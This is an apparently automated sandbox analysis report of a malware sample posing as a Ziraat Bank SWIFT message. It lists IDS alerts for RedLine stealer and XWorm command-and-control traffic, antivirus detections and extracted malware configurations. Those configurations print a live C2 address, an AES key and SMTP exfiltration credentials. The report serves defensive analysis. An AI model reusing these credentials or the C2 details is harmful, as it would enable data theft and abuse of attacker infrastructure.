2024-11-26T09:01:49.233369+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:49.235613+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:49.595276+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:51.951541+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:51.965830+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:52.049563+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:52.169983+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:52.399957+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:52.964327+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:53.391596+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:59.087190+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:02:01.314825+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:02:01.318986+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:02:01.761812+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:02:01.828037+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:02:02.222441+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:02:04.807481+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49734	212.162.149.53	36014	TCP

ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T09:01:28.230543+0100	2046056	1	A Network Trojan was detected	212.162.149.53	36014	192.168.2.5	49707	TCP
2024-11-26T09:01:37.817320+0100	2046056	1	A Network Trojan was detected	212.162.149.53	36014	192.168.2.5	49734	TCP

ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T09:01:16.683212+0100	2046045	1	A Network Trojan was detected	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:30.772529+0100	2046045	1	A Network Trojan was detected	192.168.2.5	49734	212.162.149.53	36014	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T09:01:26.528250+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49717	193.122.6.168	80	TCP
2024-11-26T09:01:34.528254+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49717	193.122.6.168	80	TCP
2024-11-26T09:01:42.622008+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49717	193.122.6.168	80	TCP
2024-11-26T09:01:50.793867+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49717	193.122.6.168	80	TCP
2024-11-26T09:01:58.043889+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49717	193.122.6.168	80	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T09:01:31.980363+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49710	TCP
2024-11-26T09:01:44.544044+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49710	TCP
2024-11-26T09:01:44.735926+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49710	TCP
2024-11-26T09:01:54.753183+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49710	TCP
2024-11-26T09:02:01.764739+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49710	TCP
2024-11-26T09:02:43.171081+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:02:54.023755+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:03:13.214721+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:03:15.312066+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:03:15.512868+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:03:26.044817+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:03:30.731931+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:03:49.266943+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:03:49.677985+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:03:49.826438+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:03:52.395538+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:03:58.781455+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:11.737829+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:12.024879+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:12.225835+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:17.911208+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:19.187123+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:23.871029+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:24.634903+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:27.867580+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:28.917832+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:29.119828+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:31.067387+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:51.862259+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:52.062573+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:52.385517+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:55.286763+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:55.486652+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:55.609365+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:05:09.499036+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:05:09.700077+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:05:16.213174+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:05:24.089816+0100	2852870	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T09:01:31.984968+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49710	212.162.149.53	7071	TCP
2024-11-26T09:01:54.754657+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49710	212.162.149.53	7071	TCP
2024-11-26T09:02:43.187425+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:02:54.032615+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:03:15.514337+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:03:26.051684+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:03:49.681251+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:03:49.830744+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:03:50.005725+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:03:52.397325+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:03:58.783309+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:12.231790+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:12.354493+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:17.913650+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:19.188935+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:24.636972+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:27.926087+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:28.920246+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:29.121466+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:31.069350+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:52.265188+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:52.385460+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:52.464744+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:55.488179+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:55.611299+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:05:09.903577+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:05:16.214897+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:05:24.090869+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49829	212.162.149.53	7071	TCP

ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T09:01:44.544044+0100	2852874	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49710	TCP
2024-11-26T09:02:01.764739+0100	2852874	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49710	TCP
2024-11-26T09:03:13.214721+0100	2852874	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:03:30.731931+0100	2852874	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:11.737829+0100	2852874	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:51.862259+0100	2852874	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:05:09.499036+0100	2852874	1	Malware Command and Control Activity Detected	212.162.149.53	7071	192.168.2.5	49829	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T09:04:22.262980+0100	2853193	1	Malware Command and Control Activity Detected	192.168.2.5	49829	212.162.149.53	7071	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\XClient.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Avira: detection malicious, Label: TR/Dropper.Gen

Found malware configuration

Source: 0000000E.00000002.2503972444.0000000002A01000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["212.162.149.53"], "Port": 7071, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: 8.2.XClient.exe.1d020000.2.raw.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}
Source: 8.2.XClient.exe.1d380000.3.raw.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["212.162.149.53:36014"], "Bot Id": "FOZ", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
Source: 8.2.XClient.exe.1cbe0000.1.raw.unpack	Malware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "info2@j-fores.com", "Password": "london@1759", "Server": "s82.gocheapweb.com", "To": "info@j-fores.com", "Port": 587}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Virustotal: Detection: 68%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\build.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\build.exe	Virustotal: Detection: 74%	Perma Link

Multi AV Scanner detection for submitted file

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	ReversingLabs: Detection: 60%
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Virustotal: Detection: 41%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\build.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31a33f8.2.raw.unpack	String decryptor: 212.162.149.53
Source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31a33f8.2.raw.unpack	String decryptor: 7071
Source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31a33f8.2.raw.unpack	String decryptor: <123456789>
Source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31a33f8.2.raw.unpack	String decryptor: <Xwormmm>
Source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31a33f8.2.raw.unpack	String decryptor: XWorm V5.6
Source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31a33f8.2.raw.unpack	String decryptor: USB.exe
Source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31a33f8.2.raw.unpack	String decryptor: %AppData%
Source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31a33f8.2.raw.unpack	String decryptor: XClient.exe

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49726 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49729 version: TLS 1.2

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: build.exe, 00000009.00000002.2613905318.0000000000C37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: @o.pdb source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2500060508.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2501115309.0000000000D89000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Roaming\GTCv.pdb source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2501115309.0000000000D58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n(C:\Windows\GTCv.pdb source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2500060508.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: GTCv.pdbd source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2500060508.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: GTCv.pdbNFm source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2501115309.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: !!.pdb source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2500060508.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2501115309.0000000000D89000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: GTCv.pdbSHA256 source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
Source:	Binary string: \??\C:\Windows\exe\GTCv.pdb source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2501115309.0000000000D89000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: GTCv.pdb21-2246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2501115309.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.PDB source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2500060508.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbh-? source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2501115309.0000000000D58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ?oC:\Users\user\AppData\Roaming\GTCv.pdb source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2500060508.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\GTCv.pdb source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2501115309.0000000000D89000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: GTCv.pdb source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2500060508.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp, Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
Source:	Binary string: \??\C:\Windows\GTCv.pdbbu source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2501115309.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\GTCv.pdbpdbTCv.pdb source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2501115309.0000000000D89000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\GTCv.pdbu source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2501115309.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: symbols\exe\GTCv.pdbo source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2500060508.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.PDB9 source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2501115309.0000000000D89000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: GTCv.pdbs\GTCv.pdbpdbTCv.pdbGTCv.pdb source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2500060508.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbni source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2501115309.0000000000D89000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 4x nop then jmp 0712FB7Ch	0_2_0712F49C
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then jmp 069E4874h	9_2_069E45B0
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then jmp 069E74E0h	9_2_069E6FE8
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then jmp 069E5077h	9_2_069E4918
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then jmp 069E371Bh	9_2_069E3703
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then jmp 069E0E1Fh	9_2_069E0A50
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then jmp 069E0E1Fh	9_2_069E0A40
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then jmp 06D17302h	9_2_06D16EE0
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then jmp 06D17782h	9_2_06D16EE0
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then jmp 06D1377Ah	9_2_06D134C8
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_06D16808
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then jmp 06D15F5Dh	9_2_06D15F3C
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 4x nop then jmp 06C6EDF8h	10_2_06C6E718

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.5:49707 -> 212.162.149.53:36014
Source: Network traffic	Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.5:49707 -> 212.162.149.53:36014
Source: Network traffic	Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 212.162.149.53:36014 -> 192.168.2.5:49707
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 212.162.149.53:36014 -> 192.168.2.5:49707
Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 212.162.149.53:7071 -> 192.168.2.5:49710
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:49710 -> 212.162.149.53:7071
Source: Network traffic	Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.5:49734 -> 212.162.149.53:36014
Source: Network traffic	Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.5:49734 -> 212.162.149.53:36014
Source: Network traffic	Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 212.162.149.53:36014 -> 192.168.2.5:49734
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 212.162.149.53:36014 -> 192.168.2.5:49734
Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49710 -> 212.162.149.53:7071
Source: Network traffic	Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 212.162.149.53:7071 -> 192.168.2.5:49710
Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 212.162.149.53:7071 -> 192.168.2.5:49829
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:49829 -> 212.162.149.53:7071
Source: Network traffic	Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 212.162.149.53:7071 -> 192.168.2.5:49829
Source: Network traffic	Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49829 -> 212.162.149.53:7071

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 212.162.149.53
Source: Malware configuration extractor	URLs: 212.162.149.53:36014

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 212.162.149.53 ports 7071,0,1,3,4,6,36014

Yara detected Generic Downloader

Source: Yara match

File source: 8.2.XClient.exe.2ce4f08.0.raw.unpack, type: UNPACKEDPE

Source: global traffic	TCP traffic: 192.168.2.5:49707 -> 212.162.149.53:36014
Source: global traffic	TCP traffic: 192.168.2.5:49741 -> 51.195.88.199:587

Source: global traffic

HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View

ASN Name: UNREAL-SERVERSUS UNREAL-SERVERSUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic

Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49717 -> 193.122.6.168:80

Source: global traffic

TCP traffic: 192.168.2.5:49741 -> 51.195.88.199:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
